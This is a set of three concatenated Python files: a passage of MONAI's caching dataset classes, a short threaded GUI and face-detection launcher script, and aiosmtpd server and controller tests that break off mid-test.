    Dataset with cache mechanism that can load data and cache deterministic transforms' result during training.

    By caching the results of non-random preprocessing transforms, it accelerates the training data pipeline.
    If the requested data is not in the cache, all transforms will run normally
    (see also :py:class:`monai.data.dataset.Dataset`).

    Users can set the cache rate or number of items to cache.
    It is recommended to experiment with different `cache_num` or `cache_rate` to identify the best training speed.

    To improve the caching efficiency, please always put as many as possible non-random transforms
    before the randomized ones when composing the chain of transforms.
    For example, if the transform is a `Compose` of::

        transforms = Compose([
            LoadImaged(),
            AddChanneld(),
            Spacingd(),
            Orientationd(),
            ScaleIntensityRanged(),
            RandCropByPosNegLabeld(),
            ToTensord()
        ])

    when `transforms` is used in a multi-epoch training pipeline, before the first training epoch,
    this dataset will cache the results up to ``ScaleIntensityRanged``, as
    all non-random transforms `LoadImaged`, `AddChanneld`, `Spacingd`, `Orientationd`, `ScaleIntensityRanged`
    can be cached. During training, the dataset will load the cached results and run
    ``RandCropByPosNegLabeld`` and ``ToTensord``, as ``RandCropByPosNegLabeld`` is a randomized transform
    and the outcome not cached.
    """

    def __init__(
        self,
        data: Sequence,
        transform: Union[Sequence[Callable], Callable],
        cache_num: int = sys.maxsize,
        cache_rate: float = 1.0,
        num_workers: Optional[int] = None,
        progress: bool = True,
    ) -> None:
        """
        Args:
            data: input data to load and transform to generate dataset for model.
            transform: transforms to execute operations on input data.
            cache_num: number of items to be cached. Default is `sys.maxsize`.
                will take the minimum of (cache_num, data_length x cache_rate, data_length).
            cache_rate: percentage of cached data in total, default is 1.0 (cache all).
                will take the minimum of (cache_num, data_length x cache_rate, data_length).
            num_workers: the number of worker processes to use.
                If num_workers is None then the number returned by os.cpu_count() is used.
            progress: whether to display a progress bar.
        """
        # Normalize to a Compose so the transform chain can be split into a
        # deterministic prefix (cached) and a randomized tail (run per epoch).
        if not isinstance(transform, Compose):
            transform = Compose(transform)
        super().__init__(data=data, transform=transform)
        self.progress = progress
        # Effective cache size: bounded by cache_num, cache_rate and the
        # dataset length, whichever is smallest.
        self.cache_num = min(int(cache_num), int(len(data) * cache_rate), len(data))
        self.num_workers = num_workers
        if self.num_workers is not None:
            # Guard against zero/negative worker counts.
            self.num_workers = max(int(self.num_workers), 1)
        # Eagerly pre-compute the deterministic results for the first
        # `cache_num` items.
        self._cache: List = self._fill_cache()

    def _fill_cache(self) -> List:
        """Run the deterministic transform prefix over the cached indices, in a thread pool."""
        if self.cache_num <= 0:
            return []
        if self.progress and not has_tqdm:
            warnings.warn("tqdm is not installed, will not show the caching progress bar.")
        with ThreadPool(self.num_workers) as p:
            if self.progress and has_tqdm:
                return list(
                    tqdm(
                        p.imap(self._load_cache_item, range(self.cache_num)),
                        total=self.cache_num,
                        desc="Loading dataset",
                    )
                )
            return list(p.imap(self._load_cache_item, range(self.cache_num)))

    def _load_cache_item(self, idx: int):
        """
        Apply the leading deterministic transforms to one item and return the result.

        Args:
            idx: the index of the input data sequence.
        """
        item = self.data[idx]
        if not isinstance(self.transform, Compose):
            raise ValueError("transform must be an instance of monai.transforms.Compose.")
        for _transform in self.transform.transforms:
            # execute all the deterministic transforms; stop at the first
            # randomized (or non-Transform callable) entry — everything from
            # there on must run per-epoch in __getitem__.
            if isinstance(_transform, RandomizableTransform) or not isinstance(_transform, Transform):
                break
            item = apply_transform(_transform, item)
        return item

    def __getitem__(self, index):
        if index >= self.cache_num:
            # no cache for this index, execute all the transforms directly
            return super(CacheDataset, self).__getitem__(index)
        # load data from cache and execute from the first random transform
        start_run = False
        if self._cache is None:
            self._cache = self._fill_cache()
        data = self._cache[index]
        if not isinstance(self.transform, Compose):
            raise ValueError("transform must be an instance of monai.transforms.Compose.")
        for _transform in self.transform.transforms:
            # Skip the cached deterministic prefix; once the first randomized
            # (or non-Transform) entry is reached, run it and every later one.
            if start_run or isinstance(_transform, RandomizableTransform) or not isinstance(_transform, Transform):
                start_run = True
                data = apply_transform(_transform, data)
        return data
class SmartCacheDataset(CacheDataset):
    """
    Re-implementation of the SmartCache mechanism in NVIDIA Clara-train SDK.
    At any time, the cache pool only keeps a subset of the whole dataset. In each epoch, only the items
    in the cache are used for training. This ensures that data needed for training is readily available,
    keeping GPU resources busy. Note that cached items may still have to go through a non-deterministic
    transform sequence before being fed to GPU. At the same time, another thread is preparing replacement
    items by applying the transform sequence to items not in cache. Once one epoch is completed, Smart
    Cache replaces the same number of items with replacement items.
    Smart Cache uses a simple `running window` algorithm to determine the cache content and replacement items.
    Let N be the configured number of objects in cache; and R be the number of replacement objects (R = ceil(N * r),
    where r is the configured replace rate).
    For more details, please refer to:
    https://docs.nvidia.com/clara/tlt-mi/clara-train-sdk-v3.0/nvmidl/additional_features/smart_cache.html#smart-cache

    For example, if we have 5 images: `[image1, image2, image3, image4, image5]`, and `cache_num=4`, `replace_rate=0.25`.
    so the actual training images cached and replaced for every epoch are as below::

        epoch 1: [image1, image2, image3, image4]
        epoch 2: [image2, image3, image4, image5]
        epoch 3: [image3, image4, image5, image1]
        epoch 4: [image4, image5, image1, image2]
        epoch N: [image[N % 5] ...]

    The usage of `SmartCacheDataset` contains 4 steps:

        1. Initialize `SmartCacheDataset` object and cache for the first epoch.
        2. Call `start()` to run replacement thread in background.
        3. Call `update_cache()` before every epoch to replace training items.
        4. Call `shutdown()` when training ends.

    Note:
        This replacement will not work if setting the `multiprocessing_context` of DataLoader to `spawn`
        or on windows(the default multiprocessing method is `spawn`) and setting `num_workers` greater than 0.
    """

    def __init__(
        self,
        data: Sequence,
        transform: Union[Sequence[Callable], Callable],
        replace_rate: float,
        cache_num: int = sys.maxsize,
        cache_rate: float = 1.0,
        num_init_workers: Optional[int] = None,
        num_replace_workers: Optional[int] = None,
        progress: bool = True,
    ) -> None:
        """
        Args:
            data: input data to load and transform to generate dataset for model.
            transform: transforms to execute operations on input data.
            replace_rate: percentage of the cached items to be replaced in every epoch.
            cache_num: number of items to be cached. Default is `sys.maxsize`.
                will take the minimum of (cache_num, data_length x cache_rate, data_length).
            cache_rate: percentage of cached data in total, default is 1.0 (cache all).
                will take the minimum of (cache_num, data_length x cache_rate, data_length).
            num_init_workers: the number of worker threads to initialize the cache for first epoch.
                If num_init_workers is None then the number returned by os.cpu_count() is used.
            num_replace_workers: the number of worker threads to prepare the replacement cache for every epoch.
                If num_replace_workers is None then the number returned by os.cpu_count() is used.
            progress: whether to display a progress bar when caching for the first epoch.

        Raises:
            ValueError: when ``replace_rate`` is not positive.
        """
        super().__init__(data, transform, cache_num, cache_rate, num_init_workers, progress)
        if self._cache is None:
            self._cache = self._fill_cache()
        if self.cache_num >= len(data):
            warnings.warn("cache_num is greater or equal than dataset length, fall back to regular CacheDataset.")
        if replace_rate <= 0:
            raise ValueError("replace_rate must be greater than 0, otherwise, please use CacheDataset.")
        self.num_replace_workers: Optional[int] = num_replace_workers
        if self.num_replace_workers is not None:
            self.num_replace_workers = max(int(self.num_replace_workers), 1)
        self._total_num: int = len(data)
        # R = ceil(N * r), capped at the number of items not currently cached.
        self._replace_num: int = min(math.ceil(self.cache_num * replace_rate), len(data) - self.cache_num)
        # Slots for the next epoch's replacement items and their source indices.
        self._replacements: List[Any] = [None for _ in range(self._replace_num)]
        self._replace_data_idx: List[int] = list(range(self._replace_num))
        # Left edge of the running window into the full dataset.
        self._start_pos: int = 0
        # Protects _round / _replace_done handshakes between the training
        # thread and the background replacement thread.
        self._update_lock: threading.Lock = threading.Lock()
        # _round <= 0 signals the background thread to shut down.
        self._round: int = 1
        self._replace_done: bool = False
        self._replace_mgr: Optional[threading.Thread] = None
        self._compute_data_idx()

    def _compute_data_idx(self):
        """
        Update the replacement data position in the total data.
        """
        for i in range(self._replace_num):
            pos: int = self._start_pos + self.cache_num + i
            # Wrap around the end of the dataset (running window).
            if pos >= self._total_num:
                pos -= self._total_num
            self._replace_data_idx[i] = pos

    def is_started(self):
        """
        Check whether the replacement thread is already started.
        """
        if self._replace_mgr is None:
            return False
        return self._replace_mgr.is_alive()

    def start(self):
        """
        Start the background thread to replace training items for every epoch.
        """
        if self._replace_mgr is None or not self.is_started():
            self._restart()

    def _restart(self):
        """
        Restart background thread if killed for some reason.
        """
        self._round = 1
        # Daemon thread: it must not keep the process alive after training.
        self._replace_mgr = threading.Thread(target=self.manage_replacement, daemon=True)
        self._replace_mgr.start()

    def _try_update_cache(self):
        """
        Update the cache items with new replacement for current epoch.

        Returns:
            bool: True when the swap happened, False when replacements are
            not ready yet (caller should retry).
        """
        with self._update_lock:
            if not self._replace_done:
                return False
            # Shift the surviving items left, then append the replacements.
            remain_num: int = self.cache_num - self._replace_num
            for i in range(remain_num):
                self._cache[i] = self._cache[i + self._replace_num]
            for i in range(self._replace_num):
                self._cache[remain_num + i] = self._replacements[i]
            # Advance the running window (with wraparound).
            self._start_pos += self._replace_num
            if self._start_pos >= self._total_num:
                self._start_pos -= self._total_num
            self._compute_data_idx()
            # ready for next round
            self._round += 1
            self._replace_done = False
            return True

    def update_cache(self):
        """
        Update cache items for current epoch, need to call this function before every epoch.
        If the cache has been shutdown before, need to restart the `_replace_mgr` thread.
        """
        if not self._replace_mgr.is_alive():
            self._restart()
        # make sure update is done
        while not self._try_update_cache():
            time.sleep(0.01)

    def _try_shutdown(self):
        """
        Wait for thread lock to shut down the background thread.
        """
        with self._update_lock:
            if self._replace_done:
                # _round = 0 tells manage_replacement() to exit its loop.
                self._round = 0
                self._replace_done = False
                return True
            return False

    def shutdown(self):
        """
        Shut down the background thread for replacement.
        """
        if not self.is_started():
            return
        # wait until replace mgr is done the current round
        while not self._try_shutdown():
            time.sleep(0.01)
        self._replace_mgr.join()

    def _replace_cache_thread(self, index: int):
        """
        Execute deterministic transforms on the new data for replacement.
        """
        pos: int = self._replace_data_idx[index]
        self._replacements[index] = self._load_cache_item(pos)

    def _compute_replacements(self):
        """
        Compute expected items for the replacement of next epoch, execute deterministic transforms.
        It can support multi-threads to accelerate the computation progress.
        """
        with ThreadPool(self.num_replace_workers) as p:
            p.map(self._replace_cache_thread, list(range(self._replace_num)))
        self._replace_done = True

    def _try_manage_replacement(self, check_round):
        """
        Wait thread lock and replace training items in the background thread.

        Returns:
            (done, round): ``done`` is True when a shutdown was requested;
            ``round`` echoes the current round so the caller can detect a
            new epoch on the next call.
        """
        with self._update_lock:
            if self._round <= 0:
                # shutdown replacement
                self._replace_done = True
                return True, -1
            # A round change means update_cache() consumed the previous
            # replacements — prepare the next batch.
            if self._round != check_round:
                self._compute_replacements()
            return False, self._round

    def manage_replacement(self):
        """
        Background thread for replacement.
        """
        check_round: int = -1
        done = False
        while not done:
            done, check_round = self._try_manage_replacement(check_round)
            time.sleep(0.01)

    def __len__(self):
        """
        The dataset length is given by cache_num instead of len(data).
        """
        return self.cache_num
class ZipDataset(Dataset):
    """
    Zip several PyTorch datasets and output data(with the same index) together in a tuple.
    If the output of single dataset is already a tuple, flatten it and extend to the result.
    For example: if datasetA returns (img, imgmeta), datasetB returns (seg, segmeta),
    finally return (img, imgmeta, seg, segmeta).
    And if the datasets don't have same length, use the minimum length of them as the length
    of ZipDataset.

    Examples::

        >>> zip_data = ZipDataset([[1, 2, 3], [4, 5]])
        >>> print(len(zip_data))
        2
        >>> for item in zip_data:
        >>>     print(item)
        [1, 4]
        [2, 5]
    """

    def __init__(self, datasets: Sequence, transform: Optional[Callable] = None) -> None:
        """
        Args:
            datasets: list of datasets to zip together.
            transform: a callable data transform operates on the zipped item from `datasets`.
        """
        super().__init__(list(datasets), transform=transform)

    def __len__(self) -> int:
        # The shortest component dataset bounds the zipped length.
        return min(len(component) for component in self.data)

    def __getitem__(self, index: int):
        zipped = []
        for component in self.data:
            element = component[index]
            # Flatten tuple/list outputs so every field appears at top level.
            if isinstance(element, (tuple, list)):
                zipped.extend(element)
            else:
                zipped.append(element)
        if self.transform is not None:
            # transform the zipped item as a whole, not element by element
            zipped = apply_transform(self.transform, zipped, map_items=False)
        # use tuple instead of list as the default collate_fn callback of MONAI DataLoader flattens nested lists
        return tuple(zipped)
class ArrayDataset(Randomizable, _TorchDataset):
    """
    Dataset for segmentation and classification tasks based on array format input data and transforms.
    It ensures the same random seeds in the randomized transforms defined for image, segmentation and label.
    The `transform` can be :py:class:`monai.transforms.Compose` or any other callable object.
    For example:
    If train based on Nifti format images without metadata, all transforms can be composed::

        img_transform = Compose(
            [
                LoadImage(image_only=True),
                AddChannel(),
                RandAdjustContrast()
            ]
        )
        ArrayDataset(img_file_list, img_transform=img_transform)

    If training based on images and the metadata, the array transforms can not be composed
    because several transforms receives multiple parameters or return multiple values. Then Users need
    to define their own callable method to parse metadata from `LoadImage` or set `affine` matrix
    to `Spacing` transform::

        class TestCompose(Compose):
            def __call__(self, input_):
                img, metadata = self.transforms[0](input_)
                img = self.transforms[1](img)
                img, _, _ = self.transforms[2](img, metadata["affine"])
                return self.transforms[3](img), metadata
        img_transform = TestCompose(
            [
                LoadImage(image_only=False),
                AddChannel(),
                Spacing(pixdim=(1.5, 1.5, 3.0)),
                RandAdjustContrast()
            ]
        )
        ArrayDataset(img_file_list, img_transform=img_transform)

    Examples::

        >>> ds = ArrayDataset([1, 2, 3, 4], lambda x: x + 0.1)
        >>> print(ds[0])
        1.1

        >>> ds = ArrayDataset(img=[1, 2, 3, 4], seg=[5, 6, 7, 8])
        >>> print(ds[0])
        [1, 5]
    """

    def __init__(
        self,
        img: Sequence,
        img_transform: Optional[Callable] = None,
        seg: Optional[Sequence] = None,
        seg_transform: Optional[Callable] = None,
        labels: Optional[Sequence] = None,
        label_transform: Optional[Callable] = None,
    ) -> None:
        """
        Initializes the dataset with the filename lists. The transform `img_transform` is applied
        to the images and `seg_transform` to the segmentations.

        Args:
            img: sequence of images.
            img_transform: transform to apply to each element in `img`.
            seg: sequence of segmentations.
            seg_transform: transform to apply to each element in `seg`.
            labels: sequence of labels.
            label_transform: transform to apply to each element in `labels`.
        """
        items = [(img, img_transform), (seg, seg_transform), (labels, label_transform)]
        self.set_random_state(seed=get_seed())
        # Build one Dataset per provided array; zip them when more than one
        # is given so a single index yields all corresponding fields.
        datasets = [Dataset(x[0], x[1]) for x in items if x[0] is not None]
        self.dataset = datasets[0] if len(datasets) == 1 else ZipDataset(datasets)
        self._seed = 0  # transform synchronization seed

    def __len__(self) -> int:
        return len(self.dataset)

    def randomize(self, data: Optional[Any] = None) -> None:
        # Draw a fresh seed; it will be pushed into every randomizable
        # transform so img/seg/label augmentations stay in sync.
        self._seed = self.R.randint(MAX_SEED, dtype="uint32")

    def __getitem__(self, index: int):
        # Re-seed before fetching: the same seed is applied to all component
        # transforms for this index, keeping their random draws aligned.
        self.randomize()
        if isinstance(self.dataset, ZipDataset):
            # set transforms of each zip component
            for dataset in self.dataset.data:
                transform = getattr(dataset, "transform", None)
                if isinstance(transform, RandomizableTransform):
                    transform.set_random_state(seed=self._seed)
        transform = getattr(self.dataset, "transform", None)
        if isinstance(transform, RandomizableTransform):
            transform.set_random_state(seed=self._seed)
        return self.dataset[index]
|
'''
Main control program. It works as follows:
- create the threads
- invoke the GUI drawing routine
- invoke face detection (this feature is still in question, but we run it
  first to gauge threading smoothness)
- the GUI's interaction button, when triggered, starts the servo/motor
  control program and the timing control program
- the GUI keeps running throughout, listening for user wake-up actions
'''
import threading

import GUI
import face_detection


def test():
    """Print diagnostic information about the currently running threads."""
    # Fixed: the original had an unbalanced closing parenthesis here.
    print(threading.active_count())
    print(threading.enumerate())
    print(threading.current_thread())


if __name__ == '__main__':
    # GUI thread: draws the interface and listens for user wake-up actions.
    # NOTE(review): original said "target = 1.Screen_Function" (invalid syntax);
    # assuming the GUI module's Screen_Function was intended — confirm.
    screen_GUI = threading.Thread(target=GUI.Screen_Function)
    screen_GUI.start()
    # Face-detection thread; keep an eye on how much CPU it consumes.
    # NOTE(review): original said "target = 2.Face_Detection" (invalid syntax);
    # assuming face_detection.Face_Detection was intended — confirm.
    face_recognition = threading.Thread(target=face_detection.Face_Detection)
    face_recognition.start()
|
test_server.py | # Copyright 2014-2021 The aiosmtpd Developers
# SPDX-License-Identifier: Apache-2.0
"""Test other aspects of the server implementation."""
import asyncio
import errno
import platform
import socket
import time
from contextlib import ExitStack
from functools import partial
from threading import Event
from pathlib import Path
from smtplib import SMTP as SMTPClient, SMTPServerDisconnected
from tempfile import mkdtemp
from threading import Thread
from typing import Generator, Optional
import pytest
from pytest_mock import MockFixture
from aiosmtpd.controller import (
Controller,
UnixSocketController,
UnthreadedController,
UnixSocketMixin,
UnixSocketUnthreadedController,
_FakeServer,
get_localhost,
)
from aiosmtpd.handlers import Sink
from aiosmtpd.smtp import SMTP as Server
from aiosmtpd.testing.helpers import catchup_delay
from .conftest import Global, AUTOSTOP_DELAY
class SlowStartController(Controller):
    """A Controller whose server thread deliberately outlasts ``ready_timeout``."""

    def __init__(self, *args, **kwargs):
        # Keep the readiness window short so tests fail fast.
        if "ready_timeout" not in kwargs:
            kwargs["ready_timeout"] = 0.5
        super().__init__(*args, **kwargs)

    def _run(self, ready_event: Event):
        # Sleep 50% longer than the allotted readiness window before the
        # real server loop starts, forcing a start() timeout.
        delay = self.ready_timeout * 1.5
        time.sleep(delay)
        super()._run(ready_event)
class SlowFactoryController(Controller):
    """A Controller whose factory hooks stall well past ``ready_timeout``."""

    def __init__(self, *args, **kwargs):
        if "ready_timeout" not in kwargs:
            kwargs["ready_timeout"] = 0.5
        super().__init__(*args, **kwargs)

    def factory(self):
        # Stall three readiness windows before producing the server.
        time.sleep(3 * self.ready_timeout)
        return super().factory()

    def _factory_invoker(self):
        # Same stall on the invoker path.
        time.sleep(3 * self.ready_timeout)
        return super()._factory_invoker()
def in_win32():
    """Return True when running on native Windows."""
    system_name = platform.system()
    return system_name.casefold() == "windows"
def in_wsl():
    """Return True when running under Windows Subsystem for Linux.

    WSL 1.0 somehow allows more than one listener on one port, so some tests
    must be skipped there. On Windows, platform.release() returns the Windows
    version (e.g., "7" or "10"); on Linux (incl. WSL) it returns the kernel
    version. As of 2021-02-07, only WSL kernels contain "Microsoft".
    """
    kernel = platform.release().casefold()
    return kernel.find("microsoft") >= 0
def in_cygwin():
    """Return True when running under Cygwin."""
    prefix = "cygwin"
    return platform.system().casefold()[: len(prefix)] == prefix
@pytest.fixture(scope="module")
def safe_socket_dir() -> Generator[Path, None, None]:
    """Yield a temp directory whose path is short enough for AF_UNIX sockets.

    See:
    - https://github.com/aio-libs/aiohttp/issues/3572
    - https://github.com/aio-libs/aiohttp/pull/3832/files
    - https://unix.stackexchange.com/a/367012/5589
    """
    tmpdir = Path(mkdtemp()).absolute()
    # 92 (max on HP-UX) minus 5 (allow 4-char fn)
    assert len(str(tmpdir)) <= 87
    #
    yield tmpdir
    # Teardown: delete children before parents (deepest paths first).
    for entry in sorted(tmpdir.rglob("*"), reverse=True):
        if entry.is_dir():
            entry.rmdir()
        else:
            entry.unlink()
    tmpdir.rmdir()
def assert_smtp_socket(controller: UnixSocketMixin) -> bool:
    """
    Exercise a minimal SMTP session (banner, EHLO, QUIT) over the
    controller's Unix-domain socket.

    Returns:
        True when the full session completed; False when no banner arrived
        before the timeout (caller may treat that as "server not listening").
        Protocol violations raise AssertionError instead.
    """
    assert Path(controller.unix_socket).exists()
    sockfile = controller.unix_socket
    ssl_context = controller.ssl_context
    with ExitStack() as stk:
        sock: socket.socket = stk.enter_context(
            socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        )
        sock.settimeout(AUTOSTOP_DELAY)
        sock.connect(str(sockfile))
        if ssl_context:
            # Wrap in TLS when the controller is configured for it.
            sock = stk.enter_context(ssl_context.wrap_socket(sock))
        catchup_delay()
        try:
            resp = sock.recv(1024)
        except socket.timeout:
            # No banner in time: report "not reachable" rather than fail.
            return False
        if not resp:
            return False
        # 220 is the SMTP greeting code.
        assert resp.startswith(b"220 ")
        assert resp.endswith(b"\r\n")
        sock.send(b"EHLO socket.test\r\n")
        # We need to "build" resparr because, especially when socket is wrapped
        # in SSL, the SMTP server takes it sweet time responding with the list
        # of ESMTP features ...
        resparr = bytearray()
        while not resparr.endswith(b"250 HELP\r\n"):
            catchup_delay()
            resp = sock.recv(1024)
            if not resp:
                break
            resparr += resp
        assert resparr.endswith(b"250 HELP\r\n")
        sock.send(b"QUIT\r\n")
        catchup_delay()
        resp = sock.recv(1024)
        # 221 is the SMTP closing code.
        assert resp.startswith(b"221")
    return True
class TestServer:
    """Tests for the aiosmtpd.smtp.SMTP class"""

    def test_smtp_utf8(self, plain_controller, client):
        # The EHLO response must advertise the SMTPUTF8 extension.
        code, mesg = client.ehlo("example.com")
        assert 250 == code
        assert b"SMTPUTF8" in mesg.splitlines()

    def test_default_max_command_size_limit(self):
        server = Server(Sink())
        assert 512 == server.max_command_size_limit

    def test_special_max_command_size_limit(self):
        # A per-command override raises the overall maximum.
        server = Server(Sink())
        server.command_size_limits["DATA"] = 1024
        assert 1024 == server.max_command_size_limit

    def test_warn_authreq_notls(self):
        expectedre = (
            r"Requiring AUTH while not requiring TLS can lead to "
            r"security vulnerabilities!"
        )
        with pytest.warns(UserWarning, match=expectedre):
            Server(Sink(), auth_require_tls=False, auth_required=True)
class TestController:
    """Tests for the aiosmtpd.controller.Controller class"""

    @pytest.mark.filterwarnings("ignore")
    def test_ready_timeout(self):
        # Server thread sleeps past ready_timeout -> start() must time out.
        cont = SlowStartController(Sink())
        expectre = (
            "SMTP server failed to start within allotted time. "
            "This might happen if the system is too busy. "
            "Try increasing the `ready_timeout` parameter."
        )
        try:
            with pytest.raises(TimeoutError, match=expectre):
                cont.start()
        finally:
            cont.stop()

    @pytest.mark.filterwarnings("ignore")
    def test_factory_timeout(self):
        # Factory stalls past ready_timeout -> start() must time out.
        cont = SlowFactoryController(Sink())
        expectre = (
            r"SMTP server started, but not responding within allotted time. "
            r"This might happen if the system is too busy. "
            r"Try increasing the `ready_timeout` parameter."
        )
        try:
            with pytest.raises(TimeoutError, match=expectre):
                cont.start()
        finally:
            cont.stop()

    def test_reuse_loop(self, temp_event_loop):
        # A caller-supplied loop must be used by both controller and server.
        cont = Controller(Sink(), loop=temp_event_loop)
        assert cont.loop is temp_event_loop
        try:
            cont.start()
            assert cont.smtpd.loop is temp_event_loop
        finally:
            cont.stop()

    @pytest.mark.skipif(in_wsl(), reason="WSL prevents socket collision")
    def test_socket_error_dupe(self, plain_controller, client):
        # Binding a second controller on the same host:port must fail.
        contr2 = Controller(
            Sink(), hostname=Global.SrvAddr.host, port=Global.SrvAddr.port
        )
        expectedre = r"error while attempting to bind on address"
        try:
            with pytest.raises(socket.error, match=expectedre):
                contr2.start()
        finally:
            contr2.stop()

    @pytest.mark.skipif(in_wsl(), reason="WSL prevents socket collision")
    def test_socket_error_default(self):
        # Two controllers with default bindings must collide.
        contr1 = Controller(Sink())
        contr2 = Controller(Sink())
        expectedre = r"error while attempting to bind on address"
        try:
            with pytest.raises(socket.error, match=expectedre):
                contr1.start()
                contr2.start()
        finally:
            contr2.stop()
            contr1.stop()

    def test_server_attribute(self):
        # `server` is populated on start() and cleared on stop().
        controller = Controller(Sink())
        assert controller.server is None
        try:
            controller.start()
            assert controller.server is not None
        finally:
            controller.stop()
            assert controller.server is None

    @pytest.mark.filterwarnings(
        "ignore:server_kwargs will be removed:DeprecationWarning"
    )
    def test_enablesmtputf8_flag(self):
        # Default is True
        controller = Controller(Sink())
        assert controller.SMTP_kwargs["enable_SMTPUTF8"]
        # Explicit set must be reflected in server_kwargs
        controller = Controller(Sink(), enable_SMTPUTF8=True)
        assert controller.SMTP_kwargs["enable_SMTPUTF8"]
        controller = Controller(Sink(), enable_SMTPUTF8=False)
        assert not controller.SMTP_kwargs["enable_SMTPUTF8"]
        # Explicit set must override server_kwargs
        kwargs = dict(enable_SMTPUTF8=False)
        controller = Controller(Sink(), enable_SMTPUTF8=True, server_kwargs=kwargs)
        assert controller.SMTP_kwargs["enable_SMTPUTF8"]
        kwargs = dict(enable_SMTPUTF8=True)
        controller = Controller(Sink(), enable_SMTPUTF8=False, server_kwargs=kwargs)
        assert not controller.SMTP_kwargs["enable_SMTPUTF8"]
        # Set through server_kwargs must not be overridden if no explicit set
        kwargs = dict(enable_SMTPUTF8=False)
        controller = Controller(Sink(), server_kwargs=kwargs)
        assert not controller.SMTP_kwargs["enable_SMTPUTF8"]

    @pytest.mark.filterwarnings(
        "ignore:server_kwargs will be removed:DeprecationWarning"
    )
    def test_serverhostname_arg(self):
        # server_hostname takes precedence over server_kwargs["hostname"].
        contsink = partial(Controller, Sink())
        controller = contsink()
        assert "hostname" not in controller.SMTP_kwargs
        controller = contsink(server_hostname="testhost1")
        assert controller.SMTP_kwargs["hostname"] == "testhost1"
        kwargs = dict(hostname="testhost2")
        controller = contsink(server_kwargs=kwargs)
        assert controller.SMTP_kwargs["hostname"] == "testhost2"
        controller = contsink(server_hostname="testhost3", server_kwargs=kwargs)
        assert controller.SMTP_kwargs["hostname"] == "testhost3"

    def test_hostname_empty(self):
        # WARNING: This test _always_ succeeds in Windows.
        cont = Controller(Sink(), hostname="")
        try:
            cont.start()
        finally:
            cont.stop()

    def test_hostname_none(self):
        cont = Controller(Sink())
        try:
            cont.start()
        finally:
            cont.stop()

    def test_testconn_raises(self, mocker: MockFixture):
        # An error during the post-start test connection must propagate.
        mocker.patch("socket.socket.recv", side_effect=RuntimeError("MockError"))
        cont = Controller(Sink(), hostname="")
        try:
            with pytest.raises(RuntimeError, match="MockError"):
                cont.start()
        finally:
            cont.stop()

    def test_getlocalhost(self):
        assert get_localhost() in ("127.0.0.1", "::1")

    def test_getlocalhost_noipv6(self, mocker):
        mock_hasip6 = mocker.patch("aiosmtpd.controller._has_ipv6", return_value=False)
        assert get_localhost() == "127.0.0.1"
        assert mock_hasip6.called

    def test_getlocalhost_6yes(self, mocker: MockFixture):
        mock_sock = mocker.Mock()
        mock_makesock: mocker.Mock = mocker.patch("aiosmtpd.controller.makesock")
        mock_makesock.return_value.__enter__.return_value = mock_sock
        assert get_localhost() == "::1"
        mock_makesock.assert_called_with(socket.AF_INET6, socket.SOCK_STREAM)
        assert mock_sock.bind.called

    # Apparently errno.E* constants adapts to the OS, so on Windows they will
    # automatically use the analogous WSAE* constants
    @pytest.mark.parametrize("err", [errno.EADDRNOTAVAIL, errno.EAFNOSUPPORT])
    def test_getlocalhost_6no(self, mocker, err):
        # Fixed: use the parametrized `err` (previously hard-coded to
        # EADDRNOTAVAIL, so the EAFNOSUPPORT case was never exercised).
        mock_makesock: mocker.Mock = mocker.patch(
            "aiosmtpd.controller.makesock",
            side_effect=OSError(err, "Mock IP4-only"),
        )
        assert get_localhost() == "127.0.0.1"
        mock_makesock.assert_called_with(socket.AF_INET6, socket.SOCK_STREAM)

    def test_getlocalhost_6inuse(self, mocker):
        # EADDRINUSE means IPv6 exists (just busy) -> still report "::1".
        mock_makesock: mocker.Mock = mocker.patch(
            "aiosmtpd.controller.makesock",
            side_effect=OSError(errno.EADDRINUSE, "Mock IP6 used"),
        )
        assert get_localhost() == "::1"
        mock_makesock.assert_called_with(socket.AF_INET6, socket.SOCK_STREAM)

    def test_getlocalhost_error(self, mocker):
        # Unexpected OSErrors must propagate unchanged.
        mock_makesock: mocker.Mock = mocker.patch(
            "aiosmtpd.controller.makesock",
            side_effect=OSError(errno.EFAULT, "Mock Error"),
        )
        with pytest.raises(OSError, match="Mock Error") as exc:
            get_localhost()
        assert exc.value.errno == errno.EFAULT
        mock_makesock.assert_called_with(socket.AF_INET6, socket.SOCK_STREAM)

    def test_stop_default(self):
        controller = Controller(Sink())
        with pytest.raises(AssertionError, match="SMTP daemon not running"):
            controller.stop()

    def test_stop_assert(self):
        controller = Controller(Sink())
        with pytest.raises(AssertionError, match="SMTP daemon not running"):
            controller.stop(no_assert=False)

    def test_stop_noassert(self):
        controller = Controller(Sink())
        controller.stop(no_assert=True)
@pytest.mark.skipif(in_cygwin(), reason="Cygwin AF_UNIX is problematic")
@pytest.mark.skipif(in_win32(), reason="Win32 does not yet fully implement AF_UNIX")
class TestUnixSocketController:
    """Tests for controllers listening on Unix-domain sockets."""

    def test_server_creation(self, safe_socket_dir):
        sockfile = safe_socket_dir / "smtp"
        controller = UnixSocketController(Sink(), unix_socket=sockfile)
        try:
            controller.start()
            assert_smtp_socket(controller)
        finally:
            controller.stop()

    def test_server_creation_ssl(self, safe_socket_dir, ssl_context_server):
        sockfile = safe_socket_dir / "smtp"
        controller = UnixSocketController(
            Sink(), unix_socket=sockfile, ssl_context=ssl_context_server
        )
        try:
            controller.start()
            # Allow additional time for SSL to kick in
            catchup_delay()
            assert_smtp_socket(controller)
        finally:
            controller.stop()
class TestUnthreaded:
    """Tests for the unthreaded controller variants."""

    @pytest.fixture
    def runner(self):
        """Provide a starter callable that runs an event loop in a daemon thread.

        The returned callable also carries ``join`` and ``is_alive`` helpers
        bound to that thread.
        """
        thread: Optional[Thread] = None

        def _runner(loop: asyncio.AbstractEventLoop):
            loop.run_forever()

        def starter(loop: asyncio.AbstractEventLoop):
            nonlocal thread
            thread = Thread(target=_runner, args=(loop,))
            # Thread.setDaemon() is deprecated since Python 3.10; assign the
            # `daemon` attribute instead (identical effect).
            thread.daemon = True
            thread.start()
            catchup_delay()

        def joiner(timeout: Optional[float] = None):
            nonlocal thread
            assert isinstance(thread, Thread)
            thread.join(timeout=timeout)

        def is_alive():
            nonlocal thread
            assert isinstance(thread, Thread)
            return thread.is_alive()

        starter.join = joiner
        starter.is_alive = is_alive
        return starter

    @pytest.mark.skipif(in_cygwin(), reason="Cygwin AF_UNIX is problematic")
    @pytest.mark.skipif(in_win32(), reason="Win32 does not yet fully implement AF_UNIX")
    def test_unixsocket(self, safe_socket_dir, autostop_loop, runner):
        sockfile = safe_socket_dir / "smtp"
        cont = UnixSocketUnthreadedController(
